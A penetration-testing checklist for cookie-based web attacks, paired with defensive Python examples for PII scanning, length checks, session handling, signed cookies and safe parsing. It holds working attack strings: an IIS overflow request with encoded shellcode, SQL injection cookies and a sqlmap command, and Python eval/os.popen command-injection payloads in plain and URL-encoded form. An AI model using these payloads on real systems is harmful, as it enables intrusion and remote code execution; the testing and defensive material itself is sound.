# Cookie Based Attacks

> Checklist

* [ ] Sensitive data stored in cookies\
  Check whether any PII or other sensitive information is stored in cookies. This usually includes: email, session ID, date of birth, mobile number, address, SSN, etc.
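As an added example (not part of the original checklist), the following Python script scans `Set-Cookie` headers for values that look like PII, including values hidden behind URL- or base64-encoding and fields of a JSON profile object. The patterns, the suspicious-name list and the sample headers are constructed for the demonstration and should be tuned to the application under test.

```python
# Added example (not part of the original checklist): scan Set-Cookie
# headers for values that look like PII or that carry a profile object.
# Cookie names, patterns and the sample headers are constructed.
import base64
import json
import re
from http.cookies import SimpleCookie
from urllib.parse import unquote

# Value shapes that should never sit in a cookie in clear text.
PATTERNS = {
    "email": re.compile(r"^[\w.+-]+@[\w-]+\.[\w.-]+$"),
    "ssn": re.compile(r"^\d{3}-\d{2}-\d{4}$"),
    "date_of_birth": re.compile(r"^(19|20)\d{2}-\d{2}-\d{2}$"),
    "phone": re.compile(r"^\+?\d{10,13}$"),
}
# Cookie or field names that suggest PII regardless of the value.
SUSPICIOUS_NAMES = ("email", "dob", "ssn", "phone", "mobile", "address", "name")


def _decode_layers(value):
    """Yield the raw value, its URL-decoded form and a base64-decoded form,
    so PII hidden behind one layer of encoding is still inspected."""
    yield value
    decoded = unquote(value)
    if decoded != value:
        yield decoded
    try:
        raw = base64.b64decode(decoded + "=" * (-len(decoded) % 4), validate=True)
        text = raw.decode("utf-8")
        if text.isprintable():
            yield text
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        pass


def _scan_value(label, text):
    """Return (label, finding) pairs for one decoded cookie value."""
    findings = []
    for finding, pattern in PATTERNS.items():
        if pattern.match(text):
            findings.append((label, finding))
    # A JSON object in a cookie often carries a whole profile; check each field.
    if text.startswith("{"):
        try:
            obj = json.loads(text)
        except json.JSONDecodeError:
            obj = None
        if isinstance(obj, dict):
            for key, val in obj.items():
                if key.lower() in SUSPICIOUS_NAMES:
                    findings.append((f"{label}.{key}", "suspicious_field"))
                if isinstance(val, str):
                    findings += _scan_value(f"{label}.{key}", val)
    return findings


def scan_set_cookie_headers(headers):
    """Return a sorted list of (cookie_name, finding) tuples for the headers."""
    findings = set()
    for header in headers:
        jar = SimpleCookie()
        jar.load(header)
        for name, morsel in jar.items():
            if name.lower() in SUSPICIOUS_NAMES:
                findings.add((name, "suspicious_name"))
            for layer in _decode_layers(morsel.value):
                findings.update(_scan_value(name, layer))
    return sorted(findings)


# Constructed sample responses: an opaque session cookie (fine), an e-mail
# address in a cookie, and a base64-encoded JSON profile with SSN and DOB.
SAMPLE_HEADERS = [
    "sid=7f3a9c2e1b4d; Path=/; HttpOnly; Secure",
    "email=alice%40example.com; Path=/",
    "profile=" + base64.b64encode(json.dumps(
        {"user": "alice", "ssn": "123-45-6789", "dob": "1990-04-01"}).encode()).decode() + "; Path=/",
]

if __name__ == "__main__":
    for name, finding in scan_set_cookie_headers(SAMPLE_HEADERS):
        print(f"{name}: {finding}")
```

Run it against the `Set-Cookie` headers collected from a crawl; an opaque random session ID produces no finding, while a reflected e-mail address or an encoded profile object is reported field by field.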

* [ ] Cookie length violation\
  Leads to buffer overflow: a cookie length which is longer than the profiled length can indicate that a buffer overflow attack attempt is taking place. In a buffer overflow attack, the attacker has to send very long strings that generate the overflow, all of them triggering this violation.

```
GET  /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a
```

* [ ] Arbitrary cookie injection\
  Try injecting arbitrary cookies using attacks such as CRLF injection. Sometimes this can be used to escalate privileges, or, if the application malfunctions, it can reveal sensitive information through stack traces.

* [ ] Mass assignment\
  Similar to parameter pollution, but here the attacker tries to inject multiple user IDs into the same user_id parameter.

* [ ] Denial of service - cookie bomb\
  Forcing the server to process cookies larger than the cookie size limit defined by the server may cause a denial of service.

```
https://target.com/index.php?param1=xxxxxxxxxxxxxxxxxxxxxx
```

  After entering "xxxxxxxxxxxxxxxxxxxxxx" as the value of param1, check your cookies. If there is a cookie whose value is "xxxxxxxxxxxxxxxxxxxxxx", the website is vulnerable.\
  References: [Hackerone #105363](https://hackerone.com/reports/105363)
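As an added example (not part of the original checklist) covering both the cookie length violation item and the cookie bomb item above, the following Python code checks the `Cookie` header of raw HTTP requests against a profiled per-cookie length and an assumed server-side total cookie budget, flags overflow-style padding, and tests whether a request parameter is reflected verbatim into a `Set-Cookie` response header (the precondition the cookie bomb test above looks for). The limits, the profiled lengths and the sample requests are constructed.

```python
# Added example (not from the original checklist): flag Cookie headers that
# exceed a profiled per-cookie length or the server's total cookie budget.
# Limits, profiled lengths and the sample requests are constructed.
import re

MAX_COOKIE_HEADER_BYTES = 4096   # assumed server-side total cookie budget
# Profiled "normal" lengths per cookie name, e.g. learned from a baseline run.
PROFILED_LENGTH = {"sessionId": 32, "lang": 5}
DEFAULT_PROFILED_LENGTH = 128


def parse_cookie_header(header_value):
    """Split a Cookie request header into (name, value) pairs, keeping order."""
    pairs = []
    for part in header_value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, sep, value = part.partition("=")
        pairs.append((name.strip(), value.strip() if sep else ""))
    return pairs


def check_cookie_header(header_value):
    """Return a list of violation strings for one Cookie header value."""
    violations = []
    size = len(header_value.encode("utf-8"))
    if size > MAX_COOKIE_HEADER_BYTES:
        violations.append(
            f"total cookie size {size} > {MAX_COOKIE_HEADER_BYTES} (cookie bomb)")
    for name, value in parse_cookie_header(header_value):
        limit = PROFILED_LENGTH.get(name, DEFAULT_PROFILED_LENGTH)
        if len(value) > limit:
            violations.append(f"{name}: length {len(value)} > profiled {limit}")
        # Heuristic: a run of 64+ identical bytes or %u-escapes is typical
        # of overflow padding rather than of a legitimate cookie value.
        if re.search(r"(.)\1{63,}", value) or "%u" in value:
            violations.append(f"{name}: overflow-style padding")
    return violations


def check_request(raw_request):
    """Extract the Cookie header(s) from a raw HTTP request and check them."""
    findings = []
    for line in raw_request.split("\r\n"):
        if line.lower().startswith("cookie:"):
            findings += check_cookie_header(line.split(":", 1)[1].strip())
    return findings


def param_reflected_in_cookie(param_value, set_cookie_headers):
    """True if a Set-Cookie response header carries the request parameter
    verbatim: the precondition for a client-triggered cookie bomb."""
    return any(param_value in header for header in set_cookie_headers)


# Constructed requests: a normal one and one carrying an oversized cookie.
NORMAL_REQUEST = ("GET / HTTP/1.1\r\nHost: example.test\r\n"
                  "Cookie: sessionId=" + "a" * 32 + "; lang=en\r\n\r\n")
BOMB_REQUEST = ("GET / HTTP/1.1\r\nHost: example.test\r\n"
                "Cookie: sessionId=" + "N" * 5000 + "; lang=en\r\n\r\n")

if __name__ == "__main__":
    for label, request in (("normal", NORMAL_REQUEST), ("bomb", BOMB_REQUEST)):
        print(label, check_request(request) or "ok")
    print(param_reflected_in_cookie("x" * 22, ["param1=" + "x" * 22 + "; Path=/"]))
```

The profiled lengths are the piece to get right: build them from a baseline of normal traffic per cookie name, since a fixed global limit either misses padded values in long legitimate cookies or floods the log with false positives.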

* [ ] SQL injection\
  How to inject the code in cookies? There are many HTTP interceptors and HTTP editors that can intercept the HTTP request before it is sent to the server; the tester can then introduce a malicious SQL statement in the cookie field. It is like a GET/POST based SQL injection, except that certain characters cannot be used. For example, `;` and `,` are typically treated as delimiters, so they end the injection if they are not URL-encoded.

```
Cookie: sessionId=xxxbad1fdc' order by 1#   (Normal)
Cookie: sessionId=xxxbad1fdc' order by 2#   (Error)
```

  After the error:

```
sqlmap -u "" --cookie="" -p "" --dbs
```

* [ ] Parameter pollution\
  1. Assume that the cookie uses a parameter called **user_id=** to retrieve some data.
  2. However, the application is not vulnerable to IDOR, and changing **user_id** to the victim's value does not help.
  3. The attacker adds another **user_id=** parameter to the cookie with the victim's user ID, like: **user_id=attacker&user_id=victim**
  4. Three things can happen here:
     - the application retrieves the victim's data
     - the application retrieves both the victim's and the attacker's data
     - the application does not retrieve the data: it is not vulnerable
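As an added example (not part of the original checklist) for the mass assignment and parameter pollution items above, the following Python code contrasts a permissive handler, which honours every `user_id` it finds in the cookie value, with a strict one that rejects duplicate keys and multi-valued IDs and binds the ID to the authenticated session. It assumes the cookie value holds query-string style parameters as in the `user_id=attacker&user_id=victim` case; the record store and IDs are constructed.

```python
# Added example (not part of the original checklist): lenient vs strict
# handling of a user_id parameter carried in a cookie value. The record
# store, user IDs and cookie layout are constructed.
from urllib.parse import parse_qs

RECORDS = {1001: "attacker's record", 1002: "victim's record"}  # constructed


class CookieParameterError(ValueError):
    """Raised when the cookie does not carry exactly one acceptable user_id."""


def lenient_ids(cookie_value):
    """How a permissive handler sees the value: parse_qs keeps every
    user_id, so code that iterates (or takes the last one) follows the
    polluted parameter."""
    return parse_qs(cookie_value).get("user_id", [])


def lenient_lookup(cookie_value):
    """Permissive handler: returns a record for every user_id present."""
    return [RECORDS[int(i)] for i in lenient_ids(cookie_value)
            if i.isdigit() and int(i) in RECORDS]


def strict_user_id(cookie_value, session_user_id):
    """Reject duplicate parameters, comma-joined IDs and any ID that is not
    the session owner's own; never trust the cookie for authorization."""
    params = parse_qs(cookie_value, keep_blank_values=True)
    ids = params.get("user_id", [])
    if len(ids) != 1:
        raise CookieParameterError(f"expected one user_id, got {len(ids)}")
    if not ids[0].isdigit():   # e.g. "1001,1002": mass assignment attempt
        raise CookieParameterError(f"user_id is not a single integer: {ids[0]!r}")
    if int(ids[0]) != session_user_id:
        raise CookieParameterError("user_id does not match the session owner")
    return int(ids[0])


def strict_lookup(cookie_value, session_user_id):
    """Strict handler: one record, and only the session owner's."""
    return RECORDS[strict_user_id(cookie_value, session_user_id)]


if __name__ == "__main__":
    polluted = "user_id=1001&user_id=1002"
    print("lenient:", lenient_lookup(polluted))
    try:
        strict_lookup(polluted, session_user_id=1001)
    except CookieParameterError as exc:
        print("strict rejected:", exc)
```

The strict version makes the three outcomes in step 4 collapse into one: a polluted or multi-valued `user_id` is refused before any data is fetched, and a single value is only accepted when it matches the server-side session.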

* [ ] Authentication bypass (cookies are not validated)\
  Try accessing a protected resource after removing the cookies.

* [ ] XSS\
  Assume that the value of the cookie parameter "name" is reflected in the application; change the "name" value to an XSS payload.

* [ ] Insufficient session management\
  1. Session does not expire on logout
  2. Long session expiry
  3. Session does not expire on password reset/change
  4. Concurrent sessions
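As an added example (not part of the original checklist), the following Python session store enforces the four controls listed above: logout invalidates the token, sessions expire on an idle and an absolute timeout, a password change invalidates every other session of the user, and a cap limits concurrent sessions per user. The timeout values and the cap are assumptions; the injectable clock exists so the expiry behaviour can be exercised without waiting.

```python
# Added example (not part of the original checklist): an in-memory session
# store that enforces expiry, logout, password-change invalidation and a
# concurrent-session cap. The limits below are assumptions.
import secrets
import time

ABSOLUTE_LIFETIME = 8 * 3600   # assumed maximum session age in seconds
IDLE_TIMEOUT = 30 * 60         # assumed inactivity timeout in seconds
MAX_CONCURRENT = 2             # assumed concurrent-session cap per user


class SessionStore:
    def __init__(self, clock=time.time):
        self.clock = clock
        self.sessions = {}   # token -> {"user", "created", "last_seen"}

    def create(self, user):
        """Issue a fresh random token; evict the oldest sessions of this
        user if the concurrent-session cap would otherwise be exceeded."""
        now = self.clock()
        active = [t for t, s in self.sessions.items() if s["user"] == user]
        excess = max(0, len(active) + 1 - MAX_CONCURRENT)
        for token in sorted(active, key=lambda t: self.sessions[t]["created"])[:excess]:
            del self.sessions[token]
        token = secrets.token_urlsafe(32)
        self.sessions[token] = {"user": user, "created": now, "last_seen": now}
        return token

    def user_for(self, token):
        """Resolve a token to its user, or None if unknown or expired."""
        session = self.sessions.get(token)
        if session is None:
            return None
        now = self.clock()
        if (now - session["created"] > ABSOLUTE_LIFETIME
                or now - session["last_seen"] > IDLE_TIMEOUT):
            del self.sessions[token]
            return None
        session["last_seen"] = now
        return session["user"]

    def logout(self, token):
        """Server-side invalidation: the token is useless after this call."""
        self.sessions.pop(token, None)

    def password_changed(self, user, keep_token=None):
        """Invalidate every session of `user` except the one that made the change."""
        for token in [t for t, s in self.sessions.items()
                      if s["user"] == user and t != keep_token]:
            del self.sessions[token]

    def active_count(self, user):
        return sum(1 for s in self.sessions.values() if s["user"] == user)


class FakeClock:
    """Controllable clock so expiry can be demonstrated without waiting."""
    def __init__(self, start=1_000_000.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


if __name__ == "__main__":
    clock = FakeClock()
    store = SessionStore(clock)
    token = store.create("alice")
    clock.advance(IDLE_TIMEOUT + 1)
    print("after idle timeout:", store.user_for(token))   # None
```

The point of the injectable clock is that each of the four checklist items becomes a unit test: issue a token, apply the event (logout, idle time, password change, extra logins) and assert the old token no longer resolves.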

* [ ] Privilege escalation
* [ ] Horizontal\
  1. Assume that the application uses a multi-organization model.
  2. Cookies are used to decide which organization a user can access.
  3. Alter the cookie in order to access some other application.

* Vertical\
  1. Assume the cookie is used to determine the role of the user.
  2. Alter the cookie in order to elevate the role of the user.

* Similarly\
  1. Try whether a lower user's cookies can be used to access higher users' functions.
  2. Try whether the cookie of an organization 1 user can be used to access functions of organization 2.
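As an added example (not part of the original checklist) for the horizontal and vertical escalation items above, the following Python code shows why a role or organization claim carried in a cookie must be integrity-protected: the claims are signed with an HMAC, so a client that rewrites `role` or `org` in the payload without the server key fails verification, and authorization is evaluated only on verified claims. The key, the role ranking and the claim names are constructed for the demonstration.

```python
# Added example (not part of the original checklist): HMAC-protected role
# and organization claims in a cookie, with tamper detection. The key,
# the role ranking and the claim names are constructed.
import base64
import hashlib
import hmac
import json
import secrets

SECRET_KEY = secrets.token_bytes(32)   # constructed; a real key comes from config
ROLE_RANK = {"user": 1, "admin": 2}    # constructed role hierarchy


def _b64(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_cookie(user_id, role, org, key=SECRET_KEY):
    """Serialize the claims and append an HMAC-SHA256 over the payload."""
    claims = {"uid": user_id, "role": role, "org": org}
    payload = _b64(json.dumps(claims, sort_keys=True).encode())
    sig = _b64(hmac.new(key, payload.encode(), hashlib.sha256).digest())
    return f"{payload}.{sig}"


def verify_cookie(cookie, key=SECRET_KEY):
    """Return the claims if the signature is valid, otherwise None."""
    try:
        payload, sig = cookie.split(".", 1)
        expected = hmac.new(key, payload.encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _unb64(sig)):
            return None
        return json.loads(_unb64(payload))
    except (ValueError, UnicodeDecodeError):
        return None


def alter_claims_unsigned(cookie, **changes):
    """What a client can do on its own: edit the claims but keep the old
    signature. Used here only to show that verification rejects it."""
    payload, sig = cookie.split(".", 1)
    claims = json.loads(_unb64(payload))
    claims.update(changes)
    return _b64(json.dumps(claims, sort_keys=True).encode()) + "." + sig


def authorize(cookie, required_role, org):
    """Allow only when the verified role ranks high enough and the verified
    organization matches the one being accessed."""
    claims = verify_cookie(cookie)
    if claims is None:
        return False
    rank = ROLE_RANK.get(claims.get("role"), 0)
    return rank >= ROLE_RANK[required_role] and claims.get("org") == org


if __name__ == "__main__":
    cookie = issue_cookie(7, "user", "org1")
    print("own org, user role:", authorize(cookie, "user", "org1"))          # True
    print("role rewritten:", authorize(alter_claims_unsigned(cookie, role="admin"), "admin", "org1"))  # False
    print("org rewritten:", authorize(alter_claims_unsigned(cookie, org="org2"), "user", "org2"))      # False
```

Signing stops the cookie from being edited, but it does not by itself stop a cookie from being replayed by another user (the "similarly" item): the server still needs to bind the cookie to the session it was issued to and to look up the user's current role rather than trusting a claim issued before a role change.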

* [ ] Session puzzling\
  When an application uses the same session variable for multiple purposes, this can be abused by an attacker to trick the application into performing an action as an authenticated or privileged user.

* [ ] Exploiting Python code injection\
  Place this payload in a cookie, the Content-Type header, the path or a parameter:

```
eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))
```

* [ ] OS command injection

```
eval(compile("""for x in range(1):\n import os\n os.popen(r'COMMAND').read()""",'','single'))
```

```
eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))
```

```
__import__('os').popen('COMMAND').read()
```

* [ ] URL encode some characters

```
param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29
```

```
param=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29
```

```
param=eval%28compile%28%22%22%22__import__%28%27os%27%29.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29
```

```
param=__import__%28%27os%27%29.popen%28%27COMMAND%27%29.read%28%29
```

Example with one expression

```
__import__('os').popen('COMMAND').read()
```

Example with multiple expressions, separated by commas

```
str("-"*50),__import__('os').popen('COMMAND').read()
```

* [ ] Insecure deserialization\
  If cookies use serialized objects, try performing insecure deserialization checks (see the PortSwigger labs).
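As an added example (not part of the original checklist) for the Python code injection, OS command injection and insecure deserialization items above, the following Python code places the root cause beside its fix: a handler that evaluates a cookie value as Python (the same class of defect as unpickling it) executes whatever expression the client sends, while a JSON parser with an allowlist of keys and types accepts only the intended preference object. It also includes a small detection helper that URL-decodes a parameter value and looks for the markers the payloads above share. The preference schema, the marker list and the sample values are constructed.

```python
# Added example (not part of the original checklist): evaluating a cookie
# value as code vs parsing it as data, plus a detection heuristic for the
# payload shapes above. Schema, markers and sample values are constructed.
import json
from urllib.parse import unquote

# Allowlisted preference fields and the exact type each must have.
ALLOWED_FIELDS = {"theme": str, "page_size": int}

# Substrings shared by the eval/compile/__import__ payloads on this page.
INJECTION_MARKERS = ("eval(", "compile(", "__import__", "os.popen",
                     "os.system", "subprocess")


def vulnerable_parse_prefs(cookie_value):
    """The anti-pattern: the cookie is evaluated as Python so a dict literal
    'round-trips'. Any expression the client sends runs on the server, which
    is exactly what the payloads above rely on. Shown for contrast only."""
    return eval(cookie_value)


def safe_parse_prefs(cookie_value):
    """Parse the cookie as JSON and keep only allowlisted keys with the
    expected type; anything else is rejected as a whole (return None)."""
    try:
        data = json.loads(cookie_value)
    except json.JSONDecodeError:
        return None
    if not isinstance(data, dict):
        return None
    prefs = {}
    for key, value in data.items():
        expected = ALLOWED_FIELDS.get(key)
        # bool is a subclass of int, so use an exact type check.
        if expected is None or type(value) is not expected:
            return None
        prefs[key] = value
    return prefs


def looks_like_code_injection(raw_value):
    """Detection heuristic for logs or a WAF: URL-decode the value and look
    for the markers the payloads above contain, in plain or encoded form."""
    text = unquote(raw_value).lower()
    return any(marker in text for marker in INJECTION_MARKERS)


if __name__ == "__main__":
    # Constructed values: a legitimate preference object and a harmless
    # expression that still demonstrates that eval() executes the cookie.
    legitimate = '{"theme": "dark", "page_size": 20}'
    expression = "__import__('math').factorial(5)"
    print("safe parser, legitimate:", safe_parse_prefs(legitimate))
    print("safe parser, expression:", safe_parse_prefs(expression))       # None
    print("vulnerable parser, expression:", vulnerable_parse_prefs(expression))  # 120
    print("flagged:", looks_like_code_injection("eval%28compile%28%27x%27%29%29"))
```

The same split applies to pickled cookies: `pickle.loads` on client-supplied bytes executes code during deserialization, so the fix is the same, a data-only format with a schema, not a filter on the pickled bytes.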

* [ ] Electronic Code Book
* [ ] Pickle Code Execution
* [ ] Cipher block chaining
* [ ] file inclusion
* [ ] IDOR
* [ ] session fixation
* [ ] padding oracle attack
* [ ] JWT attack

